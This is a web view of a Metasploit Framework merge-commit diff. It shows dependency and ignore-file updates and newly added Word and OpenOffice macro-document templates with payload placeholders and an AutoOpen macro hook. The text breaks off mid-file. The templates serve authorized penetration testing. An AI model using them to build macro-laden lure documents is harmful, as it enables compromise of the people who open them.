infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into dtc_fix

bug/bundler_fix
Pearce Barry 2017-03-20 14:10:01 -05:00 committed by GitHub
parent 0be6b8c905 06ebb22a8f
commit 2acd941b16
406 changed files with 12691 additions and 4033 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

95
.dockerignore Normal file
View File

@ -0,0 +1,95 @@
.dockerignore
.gitignore
.env*
docker-compose*.yml
docker/
!docker/msfconsole.rc
README.md
.bundle
Gemfile.local
Gemfile.local.lock
# Rubymine project directory
.idea
# Sublime Text project directory (not created by ST by default)
.sublime-project
# RVM control file, keep this to avoid backdooring Metasploit
.rvmrc
# Allow for a local choice of (unsupported / semi-supported) ruby versions
# See PR #4136 for usage, but example usage for rvm:
# rvm --create --versions-conf use 2.1.4@metasploit-framework
# Because rbenv doesn't use .versions.conf, to achieve this same functionality, run:
# rbenv shell 2.1.4
.versions.conf
# YARD cache directory
.yardoc
# Mac OS X files
.DS_Store
# database config for testing
config/database.yml
# target config file for testing
features/support/targets.yml
# simplecov coverage data
coverage
doc/
external/source/meterpreter/java/bin
external/source/meterpreter/java/build
external/source/meterpreter/java/extensions
external/source/javapayload/bin
external/source/javapayload/build
# Java binary ignores. Replace the 5 above with this once we're merged.
external/source/javapayload/*/.classpath
external/source/javapayload/*/.project
external/source/javapayload/*/.settings
external/source/javapayload/*/bin
external/source/javapayload/*/target
external/source/javapayload/*/*/.classpath
external/source/javapayload/*/*/.project
external/source/javapayload/*/*/.settings
external/source/javapayload/*/*/bin
external/source/javapayload/*/*/target
# Packaging directory
pkg
tags
*.swp
*.orig
*.rej
*~
# Ignore backups of retabbed files
*.notab
# ignore Visual Studio external source garbage
*.suo
*.sdf
*.opensdf
*.user
# Rails log directory
/log
# Rails tmp directory
/tmp
# ignore release/debug folders for exploits
external/source/exploits/**/Debug
external/source/exploits/**/Release
# Avoid checking in Meterpreter binaries. These are supplied upstream by
# the metasploit-payloads gem.
data/meterpreter/*.dll
data/meterpreter/*.php
data/meterpreter/*.py
data/meterpreter/*.bin
data/meterpreter/*.jar
data/meterpreter/*.lso
data/android
data/java
# Avoid checking in Meterpreter libs that are built from
# private source. If you're interested in this functionality,
# check out Metasploit Pro: http://metasploit.com/download
data/meterpreter/ext_server_pivot.*.dll
# Avoid checking in metakitty, the source for
# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
/metakitty
.vagrant

3
.gitignore vendored
View File

@ -85,3 +85,6 @@ data/meterpreter/ext_server_pivot.*.dll
# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
/metakitty
.vagrant
# local docker compose overrides
docker-compose.local*

6
Gemfile
View File

@ -20,7 +20,11 @@ group :development do
gem 'pry'
# module documentation
gem 'octokit', '~> 4.0'
# rails-upgrade staging gems
# session aggregator, native builds have issues on arm platforms for now
gem 'metasploit-aggregator' if [
'x86-mingw32', 'x64-mingw32',
'x86_64-linux', 'x86-linux',
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
end
group :development, :test do

116
Gemfile.lock
View File

@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (4.13.19)
metasploit-framework (4.14.3)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -14,18 +14,19 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.2.11)
metasploit-payloads (= 1.2.19)
metasploit_data_models
metasploit_payloads-mettle (= 0.1.7)
msgpack
nessus_rest
net-ssh
network_interface
nexpose
nokogiri
octokit
openssl-ccm
openvas-omp
packetfu
packetfu (= 1.1.13.pre)
patch_finder
pcaprub
pg
@ -63,29 +64,28 @@ PATH
GEM
remote: https://rubygems.org/
specs:
actionpack (4.2.7.1)
actionview (= 4.2.7.1)
activesupport (= 4.2.7.1)
actionpack (4.2.8)
actionview (= 4.2.8)
activesupport (= 4.2.8)
rack (~> 1.6)
rack-test (~> 0.6.2)
rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.2)
actionview (4.2.7.1)
activesupport (= 4.2.7.1)
actionview (4.2.8)
activesupport (= 4.2.8)
builder (~> 3.1)
erubis (~> 2.7.0)
rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.2)
activemodel (4.2.7.1)
activesupport (= 4.2.7.1)
rails-html-sanitizer (~> 1.0, >= 1.0.3)
activemodel (4.2.8)
activesupport (= 4.2.8)
builder (~> 3.1)
activerecord (4.2.7.1)
activemodel (= 4.2.7.1)
activesupport (= 4.2.7.1)
activerecord (4.2.8)
activemodel (= 4.2.8)
activesupport (= 4.2.8)
arel (~> 6.0)
activesupport (4.2.7.1)
activesupport (4.2.8)
i18n (~> 0.7)
json (~> 1.7, >= 1.7.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
@ -104,7 +104,7 @@ GEM
bcrypt (3.1.11)
bit-struct (0.15.0)
builder (3.2.3)
capybara (2.12.0)
capybara (2.13.0)
addressable
mime-types (>= 1.16)
nokogiri (>= 1.3.3)
@ -114,7 +114,7 @@ GEM
childprocess (0.5.9)
ffi (~> 1.0, >= 1.0.11)
coderay (1.1.1)
contracts (0.14.0)
contracts (0.15.0)
cucumber (2.4.0)
builder (>= 2.1.2)
cucumber-core (~> 1.5.0)
@ -142,17 +142,38 @@ GEM
railties (>= 3.0.0)
faraday (0.11.0)
multipart-post (>= 1.2, < 3)
ffi (1.9.17)
ffi (1.9.18)
filesize (0.1.1)
fivemat (1.3.2)
gherkin (4.0.0)
i18n (0.8.0)
gherkin (4.1.1)
google-protobuf (3.2.0.2)
googleauth (0.5.1)
faraday (~> 0.9)
jwt (~> 1.4)
logging (~> 2.0)
memoist (~> 0.12)
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.1.2)
google-protobuf (~> 3.1)
googleauth (~> 0.5.1)
i18n (0.8.1)
jsobfu (0.4.2)
rkelly-remix
json (1.8.6)
json (2.0.3)
jwt (1.5.6)
little-plugger (1.1.4)
logging (2.2.0)
little-plugger (~> 1.1)
multi_json (~> 1.10)
loofah (2.0.3)
nokogiri (>= 1.5.9)
metasm (1.0.2)
memoist (0.15.0)
metasm (1.0.3)
metasploit-aggregator (0.1.3)
grpc
rex-arch
metasploit-concern (2.0.3)
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
@ -169,7 +190,7 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.2.11)
metasploit-payloads (1.2.19)
metasploit_data_models (2.0.14)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -187,25 +208,26 @@ GEM
mime-types-data (3.2016.0521)
mini_portile2 (2.1.0)
minitest (5.10.1)
msgpack (1.0.3)
msgpack (1.1.0)
multi_json (1.12.1)
multi_test (0.1.2)
multipart-post (2.0.0)
nessus_rest (0.1.6)
net-ssh (4.0.1)
net-ssh (4.1.0)
network_interface (0.0.1)
nexpose (5.3.1)
nokogiri (1.7.0.1)
mini_portile2 (~> 2.1.0)
octokit (4.6.2)
sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1)
openvas-omp (0.0.4)
packetfu (1.1.11)
network_interface (~> 0.0)
pcaprub (~> 0.12)
os (0.9.6)
packetfu (1.1.13.pre)
pcaprub
patch_finder (1.0.2)
pcaprub (0.12.4)
pg (0.19.0)
pg (0.20.0)
pg_array_parser (0.0.9)
postgres_ext (3.0.0)
activerecord (>= 4.0.0)
@ -227,14 +249,14 @@ GEM
rails-deprecated_sanitizer (>= 1.0.1)
rails-html-sanitizer (1.0.3)
loofah (~> 2.0)
railties (4.2.7.1)
actionpack (= 4.2.7.1)
activesupport (= 4.2.7.1)
railties (4.2.8)
actionpack (= 4.2.8)
activesupport (= 4.2.8)
rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0)
rake (12.0.0)
rb-readline (0.5.3)
recog (2.1.4)
rb-readline (0.5.4)
recog (2.1.5)
nokogiri
redcarpet (3.4.0)
rex-arch (0.1.4)
@ -245,12 +267,12 @@ GEM
rex-core
rex-struct2
rex-text
rex-core (0.1.6)
rex-core (0.1.7)
rex-encoder (0.1.2)
metasm
rex-arch
rex-text
rex-exploitation (0.1.10)
rex-exploitation (0.1.11)
jsobfu
metasm
rex-arch
@ -279,7 +301,7 @@ GEM
rex-socket
rex-text
rex-struct2 (0.1.0)
rex-text (0.2.11)
rex-text (0.2.12)
rex-zip (0.1.1)
rex-text
rkelly-remix (0.0.7)
@ -302,13 +324,18 @@ GEM
rspec-support (~> 3.5.0)
rspec-support (3.5.0)
rubyntlm (0.6.1)
rubyzip (1.2.0)
rubyzip (1.2.1)
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0)
shoulda-matchers (3.1.1)
activesupport (>= 4.0.0)
simplecov (0.13.0)
signet (0.7.3)
addressable (~> 2.3)
faraday (~> 0.9)
jwt (~> 1.5)
multi_json (~> 1.10)
simplecov (0.14.0)
docile (~> 1.1.0)
json (>= 1.8, < 3)
simplecov-html (~> 0.10.0)
@ -317,13 +344,13 @@ GEM
sqlite3 (1.3.13)
sshkey (1.9.0)
thor (0.19.4)
thread_safe (0.3.5)
thread_safe (0.3.6)
timecop (0.8.1)
tzinfo (1.2.2)
thread_safe (~> 0.1)
tzinfo-data (1.2016.10)
tzinfo-data (1.2017.1)
tzinfo (>= 1.0.0)
windows_error (0.1.0)
windows_error (0.1.1)
xpath (2.0.0)
nokogiri (~> 1.3)
yard (0.9.8)
@ -336,6 +363,7 @@ DEPENDENCIES
cucumber-rails
factory_girl_rails
fivemat
metasploit-aggregator
metasploit-framework!
octokit (~> 4.0)
pry
@ -348,4 +376,4 @@ DEPENDENCIES
yard
BUNDLED WITH
1.14.3
1.14.6

BIN
data/SqlClrPayload/v2.0/SqlClrPayload.dll Executable file
View File

Binary file not shown.

BIN
data/SqlClrPayload/v3.5/SqlClrPayload.dll Executable file
View File

Binary file not shown.

BIN
data/SqlClrPayload/v4.0/SqlClrPayload.dll Executable file
View File

Binary file not shown.

BIN
data/SqlClrPayload/v4.5.1/SqlClrPayload.dll Executable file
View File

Binary file not shown.

BIN
data/SqlClrPayload/v4.5.2/SqlClrPayload.dll Executable file
View File

Binary file not shown.

BIN
data/SqlClrPayload/v4.5/SqlClrPayload.dll Executable file
View File

Binary file not shown.

BIN
data/SqlClrPayload/v4.6.1/SqlClrPayload.dll Executable file
View File

Binary file not shown.

BIN
data/SqlClrPayload/v4.6/SqlClrPayload.dll Executable file
View File

Binary file not shown.

2
data/exploits/office_word_macro/[Content_Types].xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>

2
data/exploits/office_word_macro/_rels/__rels Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>

2
data/exploits/office_word_macro/docProps/app.xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>105</TotalTime><Pages>1</Pages><Words>1</Words><Characters>10</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><HeadingPairs><vt:vector size="2" baseType="variant"><vt:variant><vt:lpstr>Title</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="1" baseType="lpstr"><vt:lpstr></vt:lpstr></vt:vector></TitlesOfParts><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>10</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>15.0000</AppVersion></Properties>

2
data/exploits/office_word_macro/docProps/core.xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Windows User</dc:creator><cp:keywords></cp:keywords><dc:description> PAYLOADGOESHERE</dc:description><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>32</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2017-02-01T20:39:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-02T22:26:00Z</dcterms:modified></cp:coreProperties>

2
data/exploits/office_word_macro/word/_rels/document.xml.rels Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/></Relationships>

2
data/exploits/office_word_macro/word/_rels/vbaProject.bin.rels Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/wordVbaData" Target="vbaData.xml"/></Relationships>

2
data/exploits/office_word_macro/word/document.xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><w:body><w:p w:rsidR="00A31ED0" w:rsidRDefault="00366A6C"><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/><w:r><w:t>DOCBODYGOESHER</w:t></w:r></w:p><w:sectPr w:rsidR="00A31ED0"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>

2
data/exploits/office_word_macro/word/fontTable.xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E10002FF" w:usb1="4000ACFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Calibri Light"><w:panose1 w:val="020F0302020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>

2
data/exploits/office_word_macro/word/settings.xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="15"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="differentiateMultirowTableHeaders" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="0075759D"/><w:rsid w:val="000446F5"/><w:rsid w:val="00364989"/><w:rsid w:val="00366A6C"/><w:rsid w:val="003925D3"/><w:rsid w:val="00472204"/><w:rsid w:val="004929CB"/><w:rsid w:val="004937C6"/><w:rsid w:val="004E70C7"/><w:rsid w:val="00556042"/><w:rsid w:val="005C1470"/><w:rsid w:val="00634AFC"/><w:rsid w:val="0075759D"/><w:rsid w:val="008352C1"/><w:rsid w:val="008D18EE"/><w:rsid w:val="008F274A"/><w:rsid w:val="009337EB"/><w:rsid w:val="00965754"/><w:rsid w:val="00A31ED0"/><w:rsid w:val="00AA0D43"/><w:rsid w:val="00BD14BB"/><w:rsid w:val="00C22BA6"/><w:rsid w:val="00D4037B"/><w:rsid w:val="00DD6E1E"/><w:rsid w:val="00E636EA"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1026"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/><w15:chartTrackingRefBased/><w15:docId w15:val="{0E28A8EC-7E3E-41BD-9D1E-ADE8B995AEE4}"/></w:settings>

2
data/exploits/office_word_macro/word/styles.xml Normal file
View File

File diff suppressed because one or more lines are too long

2
data/exploits/office_word_macro/word/theme/theme1.xml Normal file
View File

File diff suppressed because one or more lines are too long

2
data/exploits/office_word_macro/word/vbaData.xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>

BIN
data/exploits/office_word_macro/word/vbaProject.bin Normal file
View File

Binary file not shown.

2
data/exploits/office_word_macro/word/webSettings.xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:optimizeForBrowser/><w:relyOnVML/><w:allowPNG/></w:webSettings>

6
data/exploits/openoffice_document_macro/Basic/Standard/Module1.xml Normal file
View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">REM ***** BASIC *****
CODEGOESHERE
</script:module>

5
data/exploits/openoffice_document_macro/Basic/Standard/script-lb.xml Normal file
View File

@ -0,0 +1,5 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE library:library PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "library.dtd">
<library:library xmlns:library="http://openoffice.org/2000/library" library:name="Standard" library:readonly="false" library:passwordprotected="false">
<library:element library:name="Module1"/>
</library:library>

5
data/exploits/openoffice_document_macro/Basic/script-lc.xml Normal file
View File

@ -0,0 +1,5 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE library:libraries PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "libraries.dtd">
<library:libraries xmlns:library="http://openoffice.org/2000/library" xmlns:xlink="http://www.w3.org/1999/xlink">
<library:library library:name="Standard" library:link="false"/>
</library:libraries>

0
data/exploits/openoffice_document_macro/Configurations2/accelerator/current.xml Normal file
View File

15
data/exploits/openoffice_document_macro/META-INF/manifest.xml Normal file
View File

@ -0,0 +1,15 @@
<?xml version="1.0" encoding="UTF-8"?>
<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0" manifest:version="1.2">
<manifest:file-entry manifest:media-type="application/vnd.oasis.opendocument.text" manifest:version="1.2" manifest:full-path="/"/>
<manifest:file-entry manifest:media-type="" manifest:full-path="Configurations2/accelerator/current.xml"/>
<manifest:file-entry manifest:media-type="application/vnd.sun.xml.ui.configuration" manifest:full-path="Configurations2/"/>
<manifest:file-entry manifest:media-type="image/png" manifest:full-path="Thumbnails/thumbnail.png"/>
<manifest:file-entry manifest:media-type="text/xml" manifest:full-path="content.xml"/>
<manifest:file-entry manifest:media-type="text/xml" manifest:full-path="Basic/Standard/script-lb.xml"/>
<manifest:file-entry manifest:media-type="text/xml" manifest:full-path="Basic/Standard/Module1.xml"/>
<manifest:file-entry manifest:media-type="text/xml" manifest:full-path="Basic/script-lc.xml"/>
<manifest:file-entry manifest:media-type="text/xml" manifest:full-path="settings.xml"/>
<manifest:file-entry manifest:media-type="text/xml" manifest:full-path="styles.xml"/>
<manifest:file-entry manifest:media-type="application/rdf+xml" manifest:full-path="manifest.rdf"/>
<manifest:file-entry manifest:media-type="text/xml" manifest:full-path="meta.xml"/>
</manifest:manifest>

BIN
data/exploits/openoffice_document_macro/Thumbnails/thumbnail.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 728 B

2
data/exploits/openoffice_document_macro/content.xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8"?>
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" 